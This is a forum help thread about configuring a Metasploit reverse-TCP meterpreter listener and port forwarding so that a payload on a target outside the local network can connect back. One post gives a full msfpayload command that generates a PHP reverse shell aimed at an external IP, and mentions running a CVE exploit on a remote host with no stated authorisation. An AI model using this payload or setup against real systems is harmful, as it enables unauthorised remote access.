Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[Help] - Metasploit Reverse-TCP Config filter_list
Author
Message
[Help] - Metasploit Reverse-TCP Config #1
Hey guys,

Now, I've been learning the basics and the more advanced functions of the metasploit framework for the past month, so I think I'm pretty good. However, I've run into a little problem.

Metasploit has a payload which is basically a reverse tcp meterpreter shell on the target's system. Now, it's pretty simple if the target is on your own network, you simply set the LHOST on the payload and the listener as your own computer's internal IP address, but what about if the target is not on your own network?

Do you set the listener on your own internal IP and the payload to connect to your external IP? I assume the port has to be forwarded and allowed on your firewall.

I'm lost here. Any help is appreciated.

Aurora

Reply

RE: [Help] - Metasploit Reverse-TCP Config #2
I think if your target is outside your own network, you should put your external IP on the payload, as it is the payload that is running on the target after exploiting it.
Listener should be set on your local IP, if I remember right.

Reply

RE: [Help] - Metasploit Reverse-TCP Config #3
(05-27-2014, 07:34 PM)TechSaavy Wrote: I think if your target is outside your own network, you should put your external IP on the payload, as it is the payload that is running on the target after exploiting it.
Listener should be set on your local IP, if I remember right.

Ahh, thanks. So will setting the listener on your local IP automatically make the payload connect to your computer instead of any other on the network?

Reply

RE: [Help] - Metasploit Reverse-TCP Config #4
(05-27-2014, 07:36 PM)Aurora Wrote: Ahh, thanks. So will setting the listener on your local IP automatically make the payload connect to your computer instead of any other on the network?

If I remember right, the listener is only to bind the port to the program on your PC (someone correct me if I'm wrong, as I am unsure), so you could put for example 192.168.1.23 (your internal IP), but it should also work if you just put "localhost" in there. I don't think it will make it automatically recognize the PC though, you still have to forward the ports.

Reply

RE: [Help] - Metasploit Reverse-TCP Config #5
If you are generating the payload and then using the handler to receive the connection, you can give the listener your internal ip or 0.0.0.0. When generating the payload, however, you will need to supply your external ip as you obviously need that for the shell to recognize you over WAN.

If you're using an exploit and a reverse shell as the payload, you'll just have to supply your external ip as LHOST. Once the payload is generated, the listener will attempt to listen on your external ip. When it fails, it'll default to listening on 0.0.0.0 and you'll be able to receive your shell. I'll post some examples when I get home if you still don't understand.

Reply

RE: [Help] - Metasploit Reverse-TCP Config #6
(05-27-2014, 07:40 PM)TechSaavy Wrote: If I remember right, the listener is only to bind the port to the program on your PC (someone correct me if I'm wrong, as I am unsure), so you could put for example 192.168.1.23 (your internal IP), but it should also work if you just put "localhost" in there. I don't think it will make it automatically recognize the PC though, you still have to forward the ports.

Forward the ports in the firewall only, or also on the router?

EDIT: What's the difference between forwarding a port on your router for your internal IP and for your external IP.

(05-27-2014, 07:44 PM)Dyme Wrote: If you are generating the payload and then using the handler to receive the connection, you can give the listener your internal ip or 0.0.0.0. When generating the payload, however, you will need to supply your external ip as you obviously need that for the shell to recognize you over WAN.

If you're using an exploit and a reverse shell as the payload, you'll just have to supply your external ip as LHOST. Once the payload is generated, the listener will attempt to listen on your external ip. When it fails, it'll default to listening on 0.0.0.0 and you'll be able to receive your shell. I'll post some examples when I get home if you still don't understand.

Ahh, I think I get it. Examples would be much appreciated though.
(This post was last modified: 05-27-2014, 07:47 PM by Eclipse.)

Reply

RE: [Help] - Metasploit Reverse-TCP Config #7
(05-27-2014, 07:44 PM)Aurora Wrote: Forward the ports in the firewall only, or also on the router?

EDIT: What's the difference between forwarding a port on your router for your internal IP and for your external IP.

You only forward once, on your router to your internal IP. A tip here would be to set your internal IP to be static, as it will save a lot of trouble later on. You can find many guides for it on google.
Then you open the port on your firewall on your PC. If you're using additional firewall software make sure that you also open the port on the normal firewall (If using Windows). It can be a little buggy and block the ports even when the windows firewall is off.

Reply

RE: [Help] - Metasploit Reverse-TCP Config #8
(05-27-2014, 07:44 PM)Aurora Wrote: EDIT: What's the difference between forwarding a port on your router for your internal IP and for your external IP.

Not sure what you're talking about. You foward a port so that when you receive a connection via your external IP address, it goes to the correct internal machine.

So I would forward all incoming connections on port 80 to 192.168.1.14 if that machine was a webserver (or shell handler in this instance).

Reply

RE: [Help] - Metasploit Reverse-TCP Config #9
(05-27-2014, 07:50 PM)TechSaavy Wrote: You only forward once, on your router to your internal IP. A tip here would be to set your internal IP to be static, as it will save a lot of trouble later on. You can find many guides for it on google.
Then you open the port on your firewall on your PC. If you're using additional firewall software make sure that you also open the port on the normal firewall (If using Windows). It can be a little buggy and block the ports even when the windows firewall is off.

Yeah, I got that much, but I was just confused by this, and how it looks on your external IP:

http://www.canyouseeme.org/

(05-27-2014, 07:51 PM)Dyme Wrote: So I would forward all incoming connections on port 80 to 192.168.1.14 if that machine was a webserver (or shell handler in this instance).

Yeah, that's done.
(This post was last modified: 05-27-2014, 07:53 PM by Eclipse.)

Reply

RE: [Help] - Metasploit Reverse-TCP Config #10
(05-27-2014, 07:44 PM)Aurora Wrote: Examples would be much appreciated though.

1st situation I described. My payload was generated using:
Code:
sudo msfpayload php/meterpreter/reverse_tcp LHOST=162.210.197.234 LPORT=80 R > reversetcp.php
Then I set up the listener, executed my payload, and received my shell.
Spoiler:
[Image: YRO4xBH.gif]


2nd situation. I'm using the CVE-2013-2251 exploit on a remote host.
Spoiler:
[Image: KKX619V.gif]


Hopefully everything has been cleared up.

Reply